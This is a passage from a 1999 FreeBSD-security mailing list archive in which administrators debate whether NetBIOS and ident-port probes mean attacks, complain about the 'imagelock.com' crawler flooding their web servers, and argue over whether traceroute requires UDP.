ports. > > i beg to disagree, any access attempt from 'outside' to any netbios > ports are 99% indicative of a break-in attempt. > > in my experience, at least _ _ _ _ _ _ _ {::} {::} {::} CU in Hell _| o |_ | | _|| | / _||_| |_ |_ |_ (##) (##) (##) /Arkan#iD |_ o _||_| _||_| / _| | o |_||_||_| [||] [||] [||] Do i believe in Bible? Hell,man,i've seen one! -----BEGIN PGP SIGNATURE----- Version: 2.6.3i Charset: noconv iQCVAwUBN0lkH6H/mIJW9LeBAQH/ZAP/bfLisALvDw4ImCstJh9jhp4ssg83Dy7+ fJzX0qOgQIcmQpYmrlkTAF9lHPkzGcD9HHa8H8cduNuCkLLXWAfi8awF93UaTy5E f1aG5bbwbm+xlFDE5Po05jSuA6E5mxLjNUFwgHbzC1gbuo4oqhTK4CXfLrS1sqyO DBLUpiwen2k= =wdQP -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 24 7:45: 4 1999 Delivered-To: freebsd-security@freebsd.org Received: from idea.co.uk (ultra2.idea.co.uk [194.36.20.11]) by hub.freebsd.org (Postfix) with ESMTP id 6E55B14BD3 for ; Mon, 24 May 1999 07:43:41 -0700 (PDT) (envelope-from kiril@idea.co.uk) Received: (from kiril@localhost) by idea.co.uk (8.9.2/8.9.2) id PAA03027; Mon, 24 May 1999 15:35:18 +0100 (BST) From: Kiril Mitev Message-Id: <199905241435.PAA03027@idea.co.uk> Subject: Re: Server trying to connect to Port 113 To: ark@eltex.ru Date: Mon, 24 May 1999 15:35:18 +0100 (BST) Cc: kiril@ideaglobal.com, des@flood.ping.uio.no, eltex.ru@ideaglobal.com, greg@qmpgmc.ac.uk, freebsd-security@FreeBSD.ORG In-Reply-To: <199905241437.SAA23349@paranoid.eltex.spb.ru> from "ark@eltex.ru" at May 24, 99 06:37:21 pm X-Mailer: ELM [version 2.4 PL25] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Yes. Ever seen scans of netbios ports across your whole DMZ ? K > > -----BEGIN PGP SIGNED MESSAGE----- > > nuqneH, > > Ever seen netbios name requests from misconfigured servers (cretins like > www.intel.ru and so on)? > > Kiril Mitev said : > > > > > > > "Greg Quinlan" writes: > > > > So will it effect anything by opening port 113? ...(getting 2000 or so log > > > > entries from the same server) > > > > > > Don't log, or at least, don't log connections to ports to which you > > > excpect benign (if misguided) traffic, such as auth and the netbios > > > ports. > > > > i beg to disagree, any access attempt from 'outside' to any netbios > > ports are 99% indicative of a break-in attempt. > > > > in my experience, at least > > > _ _ _ _ _ _ _ > {::} {::} {::} CU in Hell _| o |_ | | _|| | / _||_| |_ |_ |_ > (##) (##) (##) /Arkan#iD |_ o _||_| _||_| / _| | o |_||_||_| > [||] [||] [||] Do i believe in Bible? Hell,man,i've seen one! > > -----BEGIN PGP SIGNATURE----- > Version: 2.6.3i > Charset: noconv > > iQCVAwUBN0lkH6H/mIJW9LeBAQH/ZAP/bfLisALvDw4ImCstJh9jhp4ssg83Dy7+ > fJzX0qOgQIcmQpYmrlkTAF9lHPkzGcD9HHa8H8cduNuCkLLXWAfi8awF93UaTy5E > f1aG5bbwbm+xlFDE5Po05jSuA6E5mxLjNUFwgHbzC1gbuo4oqhTK4CXfLrS1sqyO > DBLUpiwen2k= > =wdQP > -----END PGP SIGNATURE----- > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 24 7:45:26 1999 Delivered-To: freebsd-security@freebsd.org Received: from eltex.ru (ELTEX-2-SPIIRAS.nw.ru [195.19.204.46]) by hub.freebsd.org (Postfix) with ESMTP id 649E61537E for ; Mon, 24 May 1999 07:45:20 -0700 (PDT) (envelope-from ark@eltex.ru) Received: from border.eltex.spb.ru (root@border.eltex.ru [195.19.198.2]) by eltex.ru (8.8.8/8.8.8) with SMTP id SAA29971; Mon, 24 May 1999 18:45:09 +0400 (MSD) Received: by border.eltex.spb.ru (ssmtp TIS-0.5alpha, 19 Oct 1998); Mon, 24 May 1999 18:44:34 +0400 Received: from undisclosed-intranet-sender id xma015066; Mon, 24 May 99 18:44:16 +0400 Date: Mon, 24 May 1999 18:44:07 +0400 Message-Id: <199905241444.SAA23381@paranoid.eltex.spb.ru> In-Reply-To: <199905241435.PAA03027@idea.co.uk> from "Kiril Mitev " From: ark@eltex.ru Organization: "Klingon Imperial Intelligence Service" Subject: Re: Server trying to connect to Port 113 To: kiril@ideaglobal.com Cc: eltex.ru@ideaglobal.com, greg@qmpgmc.ac.uk, freebsd-security@FreeBSD.ORG, ark@eltex.ru, des@flood.ping.uio.no Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- nuqneH, Netbios session service, yes. Netbios datagram/name service, no. Kiril Mitev said : > Yes. > > Ever seen scans of netbios ports across your whole DMZ ? > > K > > nuqneH, > > > > Ever seen netbios name requests from misconfigured servers (cretins like > > www.intel.ru and so on)? > > > > Kiril Mitev said : > > > > > > > > > > "Greg Quinlan" writes: > > > > > So will it effect anything by opening port 113? ...(getting 2000 or so log > > > > > entries from the same server) > > > > > > > > Don't log, or at least, don't log connections to ports to which you > > > > excpect benign (if misguided) traffic, such as auth and the netbios > > > > ports. > > > > > > i beg to disagree, any access attempt from 'outside' to any netbios > > > ports are 99% indicative of a break-in attempt. > > > > > > in my experience, at least _ _ _ _ _ _ _ {::} {::} {::} CU in Hell _| o |_ | | _|| | / _||_| |_ |_ |_ (##) (##) (##) /Arkan#iD |_ o _||_| _||_| / _| | o |_||_||_| [||] [||] [||] Do i believe in Bible? Hell,man,i've seen one! -----BEGIN PGP SIGNATURE----- Version: 2.6.3i Charset: noconv iQCVAwUBN0lltaH/mIJW9LeBAQHOlQP+Kq4iYkQAbMh2ggXD8FV64bDxfW7t8gOR x6ASa5w9nHdyuOHXDcIFYp9jmJCV2tPfZitgU5wbZ1nGdxwf+AHmB15y2I6m8X4/ qQdZduBGFYrCk4w50F4FS25n4TcIJcedEihCOMQoMGUfurclOsIIPmbgGNh3ZJxE JFZAUDdZo/0= =yKmu -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 24 7:45:47 1999 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 59363153C6 for ; Mon, 24 May 1999 07:45:44 -0700 (PDT) (envelope-from des@flood.ping.uio.no) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.1) id QAA90379; Mon, 24 May 1999 16:45:42 +0200 (CEST) (envelope-from des) To: Kiril Mitev Cc: greg@qmpgmc.ac.uk, freebsd-security@FreeBSD.ORG Subject: Re: Server trying to connect to Port 113 References: <199905241422.PAA02615@idea.co.uk> From: Dag-Erling Smorgrav Date: 24 May 1999 16:45:41 +0200 In-Reply-To: Kiril Mitev's message of "Mon, 24 May 1999 15:22:29 +0100 (BST)" Message-ID: Lines: 18 X-Mailer: Gnus v5.5/Emacs 19.34 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Kiril Mitev writes: > > Don't log, or at least, don't log connections to ports to which you > > excpect benign (if misguided) traffic, such as auth and the netbios > > ports. > i beg to disagree, any access attempt from 'outside' to any netbios > ports are 99% indicative of a break-in attempt. Wrong on two points: most NetBIOS traffic is benign, and when it is an attack, it's most likely a DoS and not a break-in. I don't know of any way to gain access to a machine through NetBIOS services; I do however know of several ways to kill Windows that way (most, if not all, are not directly related to NetBIOS, but use the NetBIOS ports because Windows is likely to be listening there). Chasing after script kiddies who try to WinNuke a FreeBSD box is, IMHO, a total waste of energy. DES -- Dag-Erling Smorgrav - des@flood.ping.uio.no To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 24 7:46:59 1999 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 0B6A314BD3 for ; Mon, 24 May 1999 07:46:56 -0700 (PDT) (envelope-from des@flood.ping.uio.no) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.1) id QAA90393; Mon, 24 May 1999 16:46:52 +0200 (CEST) (envelope-from des) To: Kiril Mitev Cc: ark@eltex.ru, eltex.ru@ideaglobal.com, greg@qmpgmc.ac.uk, freebsd-security@FreeBSD.ORG Subject: Re: Server trying to connect to Port 113 References: <199905241435.PAA03027@idea.co.uk> From: Dag-Erling Smorgrav Date: 24 May 1999 16:46:51 +0200 In-Reply-To: Kiril Mitev's message of "Mon, 24 May 1999 15:35:18 +0100 (BST)" Message-ID: Lines: 9 X-Mailer: Gnus v5.5/Emacs 19.34 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Kiril Mitev writes: > Ever seen scans of netbios ports across your whole DMZ ? WinNuke scans. Nothing to worry about, unless you run Windows (and if you do, you have worse things to worry about). DES -- Dag-Erling Smorgrav - des@flood.ping.uio.no To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 24 7:56:24 1999 Delivered-To: freebsd-security@freebsd.org Received: from adelphi.physics.adelaide.edu.au (adelphi.physics.adelaide.edu.au [129.127.36.247]) by hub.freebsd.org (Postfix) with ESMTP id C5FF214E89 for ; Mon, 24 May 1999 07:56:20 -0700 (PDT) (envelope-from kkennawa@physics.adelaide.edu.au) Received: from bragg (bragg [129.127.36.34]) by adelphi.physics.adelaide.edu.au (8.8.8/8.8.8/UofA-1.5) with SMTP id AAA23607; Tue, 25 May 1999 00:26:15 +0930 (CST) Received: from localhost by bragg; (5.65/1.1.8.2/05Aug95-0227PM) id AA32582; Tue, 25 May 1999 00:27:11 +0930 Date: Tue, 25 May 1999 00:27:11 +0930 (CST) From: Kris Kennaway X-Sender: kkennawa@bragg To: Kiril Mitev Cc: Dag-Erling Smorgrav , greg@qmpgmc.ac.uk, freebsd-security@freebsd.org Subject: Re: Server trying to connect to Port 113 In-Reply-To: <199905241422.PAA02615@idea.co.uk> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 24 May 1999, Kiril Mitev wrote: > > "Greg Quinlan" writes: > > > So will it effect anything by opening port 113? ...(getting 2000 or so log > > > entries from the same server) > > > > Don't log, or at least, don't log connections to ports to which you > > excpect benign (if misguided) traffic, such as auth and the netbios > > ports. > > i beg to disagree, any access attempt from 'outside' to any netbios > ports are 99% indicative of a break-in attempt. Windows machines like to attempt NetBIOS connections to remote machines in the Internet under certain circumstances when you attempt a TCP/IP connection. I think it's the fault of Internet Exploder mostly - usually it's port 137, but port 138 and 139 are seen occasionally (they're other NetBIOS control ports). I think it's trying to do a WINS lookup in parallel with your TCP connection or something. I see lots out outgoing NetBIOS packets on my network, not just incoming ones. To be sure, there are a lot of forged or malign packets floating around as well, but they're not all bad. I don't know what the heck is wrong with the Windows TCP stack, BTW[1]. I see all kinds of bizarre traffic outgoing from the machines on the LAN at work (which isn't even that big). By far the strangest would have to be a Lose'95 machine which likes to address its packets in reverse byte order: 4.3.2.1 for 1.2.3.4. Go figure :-) Kris [1] Rhetorical question. ----- "Never criticize anybody until you have walked a mile in their shoes, because by that time you will be a mile away and have their shoes." -- Unknown To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 24 7:58:55 1999 Delivered-To: freebsd-security@freebsd.org Received: from adelphi.physics.adelaide.edu.au (adelphi.physics.adelaide.edu.au [129.127.36.247]) by hub.freebsd.org (Postfix) with ESMTP id A9EF514E89 for ; Mon, 24 May 1999 07:58:51 -0700 (PDT) (envelope-from kkennawa@physics.adelaide.edu.au) Received: from bragg (bragg [129.127.36.34]) by adelphi.physics.adelaide.edu.au (8.8.8/8.8.8/UofA-1.5) with SMTP id AAA23108; Tue, 25 May 1999 00:28:50 +0930 (CST) Received: from localhost by bragg; (5.65/1.1.8.2/05Aug95-0227PM) id AA03461; Tue, 25 May 1999 00:29:42 +0930 Date: Tue, 25 May 1999 00:29:42 +0930 (CST) From: Kris Kennaway X-Sender: kkennawa@bragg To: Joao Assad Cc: freebsd-security@freebsd.org Subject: Re: Denial of service attack from "imagelock.com" In-Reply-To: <37492DE5.2822267@domain.com.br> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 24 May 1999, Joao Assad wrote: > > The Webmasters on this list may want to look over their logs to see > > if they've been hit and not known it. grep your logs for imagelock.com; > > if you find that they're abusing your server, you may want to firewall > > them out and complain to ABOVE.NET. > > Damn they scanned all my servers, I didnt check before because I though they > wouldnt be interested in a .br server.... Seems like they got here coming > through > our tucows mirror and once they got in our network they started scanning all > our > servers. 750 hits on one of my small web servers last night. Didn't check the others yet.. Kris ----- "Never criticize anybody until you have walked a mile in their shoes, because by that time you will be a mile away and have their shoes." -- Unknown To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 24 8: 1:24 1999 Delivered-To: freebsd-security@freebsd.org Received: from adelphi.physics.adelaide.edu.au (adelphi.physics.adelaide.edu.au [129.127.36.247]) by hub.freebsd.org (Postfix) with ESMTP id 0193E14E89 for ; Mon, 24 May 1999 08:01:21 -0700 (PDT) (envelope-from kkennawa@physics.adelaide.edu.au) Received: from bragg (bragg [129.127.36.34]) by adelphi.physics.adelaide.edu.au (8.8.8/8.8.8/UofA-1.5) with SMTP id AAA23544; Tue, 25 May 1999 00:31:19 +0930 (CST) Received: from localhost by bragg; (5.65/1.1.8.2/05Aug95-0227PM) id AA06575; Tue, 25 May 1999 00:32:14 +0930 Date: Tue, 25 May 1999 00:32:14 +0930 (CST) From: Kris Kennaway X-Sender: kkennawa@bragg To: Dag-Erling Smorgrav Cc: Kiril Mitev , greg@qmpgmc.ac.uk, freebsd-security@freebsd.org Subject: Re: Server trying to connect to Port 113 In-Reply-To: Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 24 May 1999, Dag-Erling Smorgrav wrote: > Wrong on two points: most NetBIOS traffic is benign, and when it is an > attack, it's most likely a DoS and not a break-in. I don't know of any > way to gain access to a machine through NetBIOS services; I do however Except for guessing a share password - see ports/security/nbaudit. Reason enough to block all traffic on ports 137-139 on your firewall, WinNukes notwithstanding. Kris ----- "Never criticize anybody until you have walked a mile in their shoes, because by that time you will be a mile away and have their shoes." -- Unknown To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 24 8: 2: 4 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail.siol.net (odin.siol.net [193.189.160.10]) by hub.freebsd.org (Postfix) with ESMTP id 2151C15409 for ; Mon, 24 May 1999 08:01:59 -0700 (PDT) (envelope-from tomaz.borstnar@over.net) Received: from hang ([212.30.94.134]) by mail.siol.net (Post.Office MTA v3.5.3 release 223 ID# 620-58654U60000L60000S0V35) with ESMTP id net; Mon, 24 May 1999 17:01:55 +0200 Message-Id: <4.2.0.54.19990524164739.00dd1240@193.189.189.100> X-Sender: tmail@193.189.189.100 X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.54 (Beta) Date: Mon, 24 May 1999 16:48:26 +0200 To: Theo Purmer From: Tomaz Borstnar Subject: Re: why not take this a little further (proposal) Cc: "'freebsd-security@FreeBSD.ORG'" In-Reply-To: <01BEA5CD.798B3EC0@theo.tepucom.nl> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 12:09 24.5.99 , Theo Purmer wrote the following message: >Why not take this a little further and setup a "place" >where these forms off abuse can be reported and Try "Internet robots discussion " list. Tomaz ---- Tomaz Borstnar "Love is the answer to the final question you ask" - Unknown To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 24 8:30:48 1999 Delivered-To: freebsd-security@freebsd.org Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id 5F48B14C8C for ; Mon, 24 May 1999 08:30:44 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id JAA03885; Mon, 24 May 1999 09:29:06 -0600 (MDT) Message-Id: <4.2.0.37.19990524092545.0474cd50@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.37 (Beta) Date: Mon, 24 May 1999 09:28:08 -0600 To: Joao Assad , freebsd-security@FreeBSD.ORG From: Brett Glass Subject: Re: Denial of service attack from "imagelock.com" In-Reply-To: <37492DE5.2822267@domain.com.br> References: <199905231424140440.0E81E3D5@quaggy.ursine.com> <4.2.0.37.19990523191423.04639500@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 10:45 AM 5/24/99 +0000, Joao Assad wrote: >In my logs I see a 10 secs interval between each request. In some of the ones I administer, it was 3 seconds or less. And it ramps up, as if one of their scavengers feeds URLs to the others. So much for the 3-10 minutes they claim! --Brett Glass To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 24 8:45:12 1999 Delivered-To: freebsd-security@freebsd.org Received: from alive.znep.com (sense-sea-MegaSub-1-222.oz.net [216.39.144.222]) by hub.freebsd.org (Postfix) with ESMTP id EA5CA14C8C for ; Mon, 24 May 1999 08:45:09 -0700 (PDT) (envelope-from marcs@znep.com) Received: from localhost (marcs@localhost) by alive.znep.com (8.9.1/8.9.1) with ESMTP id IAA25267; Mon, 24 May 1999 08:50:08 -0700 (PDT) (envelope-from marcs@znep.com) Date: Mon, 24 May 1999 08:50:08 -0700 (PDT) From: Marc Slemko To: Brett Glass Cc: freebsd-security@FreeBSD.ORG Subject: Re: Denial of service attack from "imagelock.com" In-Reply-To: <4.2.0.37.19990524092545.0474cd50@localhost> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 24 May 1999, Brett Glass wrote: > At 10:45 AM 5/24/99 +0000, Joao Assad wrote: > > >In my logs I see a 10 secs interval between each request. > > In some of the ones I administer, it was 3 seconds or > less. And it ramps up, as if one of their scavengers > feeds URLs to the others. > > So much for the 3-10 minutes they claim! 3-10 minutes? Ha. I was seeing 10-20 hits per second on some machines, with hundreds of thousands of hits per day. Their robot is broken because it doesn't follow proper robot etiquette (eg. robots.txt, using a reasonable useragent, etc.), it does not behave like a "nice" robot should to lessen resource use, it apparently has no methods in place to stop it from crawling infinite loops in CGI scripts or other dynamic content, plus it is horribly dumb and appears to like randomly adding '/'s onto the end of URLs to see if it gets anything useful, plus it can't even parse HTML properly half the time. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 24 8:51:32 1999 Delivered-To: freebsd-security@freebsd.org Received: from gatekeeper.iserver.com (gatekeeper.iserver.com [192.41.0.2]) by hub.freebsd.org (Postfix) with ESMTP id 7F95C14C8C for ; Mon, 24 May 1999 08:51:31 -0700 (PDT) (envelope-from hart@iserver.com) Received: by gatekeeper.iserver.com; Mon, 24 May 1999 09:51:30 -0600 (MDT) Received: from unknown(192.168.1.109) by gatekeeper.iserver.com via smap (V3.1.1) id xma007157; Mon, 24 May 99 09:51:03 -0600 Received: (hart@localhost) by anchovy.orem.iserver.com (8.9.2) id JAA10648; Mon, 24 May 1999 09:50:27 -0600 (MDT) Date: Mon, 24 May 1999 09:50:27 -0600 (MDT) From: Paul Hart X-Sender: hart@anchovy.orem.iserver.com To: Dag-Erling Smorgrav Cc: freebsd-security@FreeBSD.ORG Subject: Re: Server trying to connect to Port 113 In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 24 May 1999, Dag-Erling Smorgrav wrote: > I don't know of any way to gain access to a machine through NetBIOS > services; What about the remote root overflow exploit for Samba a while back? Paul Hart -- Paul Robert Hart ><8> ><8> ><8> Verio Web Hosting, Inc. hart@iserver.com ><8> ><8> ><8> http://www.iserver.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 24 8:54:50 1999 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 6DB4B153EA for ; Mon, 24 May 1999 08:54:47 -0700 (PDT) (envelope-from des@flood.ping.uio.no) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.1) id RAA90661; Mon, 24 May 1999 17:54:44 +0200 (CEST) (envelope-from des) To: Paul Hart Cc: Dag-Erling Smorgrav , freebsd-security@FreeBSD.ORG Subject: Re: Server trying to connect to Port 113 References: From: Dag-Erling Smorgrav Date: 24 May 1999 17:54:43 +0200 In-Reply-To: Paul Hart's message of "Mon, 24 May 1999 09:50:27 -0600 (MDT)" Message-ID: Lines: 12 X-Mailer: Gnus v5.5/Emacs 19.34 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Paul Hart writes: > On 24 May 1999, Dag-Erling Smorgrav wrote: > > I don't know of any way to gain access to a machine through NetBIOS > > services; > What about the remote root overflow exploit for Samba a while back? It does not invalidate my claim of not *knowing* of any way to gain access to a machine through NetBIOS services :) DES -- Dag-Erling Smorgrav - des@flood.ping.uio.no To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 24 8:57:24 1999 Delivered-To: freebsd-security@freebsd.org Received: from idea.co.uk (ultra2.idea.co.uk [194.36.20.11]) by hub.freebsd.org (Postfix) with ESMTP id EDA22153EA for ; Mon, 24 May 1999 08:55:54 -0700 (PDT) (envelope-from kiril@idea.co.uk) Received: (from kiril@localhost) by idea.co.uk (8.9.2/8.9.2) id QAA05550; Mon, 24 May 1999 16:48:45 +0100 (BST) From: Kiril Mitev Message-Id: <199905241548.QAA05550@idea.co.uk> Subject: Re: Server trying to connect to Port 113 To: ark@eltex.ru Date: Mon, 24 May 1999 16:48:45 +0100 (BST) Cc: kiril@ideaglobal.com, eltex.ru@ideaglobal.com, greg@qmpgmc.ac.uk, freebsd-security@FreeBSD.ORG, des@flood.ping.uio.no In-Reply-To: <199905241444.SAA23381@paranoid.eltex.spb.ru> from "ark@eltex.ru" at May 24, 99 06:44:07 pm X-Mailer: ELM [version 2.4 PL25] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Worry or not, those logs were wot it took to get big boss to buy real router :-) K > > -----BEGIN PGP SIGNED MESSAGE----- > > nuqneH, > > Netbios session service, yes. Netbios datagram/name service, no. > > Kiril Mitev said : > > > Yes. > > > > Ever seen scans of netbios ports across your whole DMZ ? > > > > K > > > > nuqneH, > > > > > > Ever seen netbios name requests from misconfigured servers (cretins like > > > www.intel.ru and so on)? > > > > > > Kiril Mitev said : > > > > > > > > > > > > > "Greg Quinlan" writes: > > > > > > So will it effect anything by opening port 113? ...(getting 2000 or so log > > > > > > entries from the same server) > > > > > > > > > > Don't log, or at least, don't log connections to ports to which you > > > > > excpect benign (if misguided) traffic, such as auth and the netbios > > > > > ports. > > > > > > > > i beg to disagree, any access attempt from 'outside' to any netbios > > > > ports are 99% indicative of a break-in attempt. > > > > > > > > in my experience, at least > > > _ _ _ _ _ _ _ > {::} {::} {::} CU in Hell _| o |_ | | _|| | / _||_| |_ |_ |_ > (##) (##) (##) /Arkan#iD |_ o _||_| _||_| / _| | o |_||_||_| > [||] [||] [||] Do i believe in Bible? Hell,man,i've seen one! > > -----BEGIN PGP SIGNATURE----- > Version: 2.6.3i > Charset: noconv > > iQCVAwUBN0lltaH/mIJW9LeBAQHOlQP+Kq4iYkQAbMh2ggXD8FV64bDxfW7t8gOR > x6ASa5w9nHdyuOHXDcIFYp9jmJCV2tPfZitgU5wbZ1nGdxwf+AHmB15y2I6m8X4/ > qQdZduBGFYrCk4w50F4FS25n4TcIJcedEihCOMQoMGUfurclOsIIPmbgGNh3ZJxE > JFZAUDdZo/0= > =yKmu > -----END PGP SIGNATURE----- > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 24 9: 3:33 1999 Delivered-To: freebsd-security@freebsd.org Received: from ns.mt.sri.com (sri-gw.MT.net [206.127.105.141]) by hub.freebsd.org (Postfix) with ESMTP id 02C3614BD4 for ; Mon, 24 May 1999 09:03:27 -0700 (PDT) (envelope-from nate@mt.sri.com) Received: from mt.sri.com (rocky.mt.sri.com [206.127.76.100]) by ns.mt.sri.com (8.8.8/8.8.8) with SMTP id KAA09671; Mon, 24 May 1999 10:03:18 -0600 (MDT) (envelope-from nate@rocky.mt.sri.com) Received: by mt.sri.com (SMI-8.6/SMI-SVR4) id KAA11763; Mon, 24 May 1999 10:03:17 -0600 Date: Mon, 24 May 1999 10:03:17 -0600 Message-Id: <199905241603.KAA11763@mt.sri.com> From: Nate Williams MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit To: Dag-Erling Smorgrav Cc: "Bert Kellerman" , "Matthew Dillon" , Subject: Re: Denial of service attack from "imagelock.com" In-Reply-To: References: <4.2.0.37.19990522105949.0465d4a0@localhost> <199905221714.KAA74179@apollo.backplane.com> <009401bea570$09546a80$5f64a8c0@crackhouse.com> X-Mailer: VM 6.34 under 19.16 "Lille" XEmacs Lucid Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > "Bert Kellerman" writes: > > You need UDP connectivity to perform a successful traceroute from a UNIX > > client..not TCP. [...] > > Bullshit. RTFM. DES, you don't know what you're talking about. A ping doesn't require UDP, but traceroute certainly coes. Nate To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 24 9: 8:20 1999 Delivered-To: freebsd-security@freebsd.org Received: from verdi.nethelp.no (verdi.nethelp.no [158.36.41.162]) by hub.freebsd.org (Postfix) with SMTP id CA00615452 for ; Mon, 24 May 1999 09:08:16 -0700 (PDT) (envelope-from sthaug@nethelp.no) Received: (qmail 32726 invoked by uid 1001); 24 May 1999 16:08:15 +0000 (GMT) To: nate@mt.sri.com Cc: security@FreeBSD.ORG Subject: Re: Denial of service attack from "imagelock.com" From: sthaug@nethelp.no In-Reply-To: Your message of "Mon, 24 May 1999 10:03:17 -0600" References: <199905241603.KAA11763@mt.sri.com> X-Mailer: Mew version 1.05+ on Emacs 19.34.2 Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Date: Mon, 24 May 1999 18:08:15 +0200 Message-ID: <32724.927562095@verdi.nethelp.no> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > DES, you don't know what you're talking about. A ping doesn't require > UDP, but traceroute certainly coes. DES pointed out that the current FreeBSD traceroute doesn't require UDP, but can also run over TCP. This is certainly a valid point, but since the traceroute that *most* users will have access to does indeed use UDP, I'd say that "bullshit" is a bit too strong... Steinar Haug, Nethelp consulting, sthaug@nethelp.no To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 24 9: 9:23 1999 Delivered-To: freebsd-security@freebsd.org Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id 7877115469 for ; Mon, 24 May 1999 09:09:20 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id KAA04281; Mon, 24 May 1999 10:03:42 -0600 (MDT) Message-Id: <4.2.0.37.19990524100208.04727460@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.37 (Beta) Date: Mon, 24 May 1999 10:03:38 -0600 To: Poul-Henning Kamp , Michael Richards <026809r@dragon.acadiau.ca> From: Brett Glass Subject: Re: Denial of service attack from "imagelock.com" Cc: freebsd-security@FreeBSD.ORG In-Reply-To: <11146.927527966@critter.freebsd.dk> References: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I like this idea. BUT.... You'll still get their SYNs and use up kernel memory. (Only the OUTBOUND packets will disappear into a black 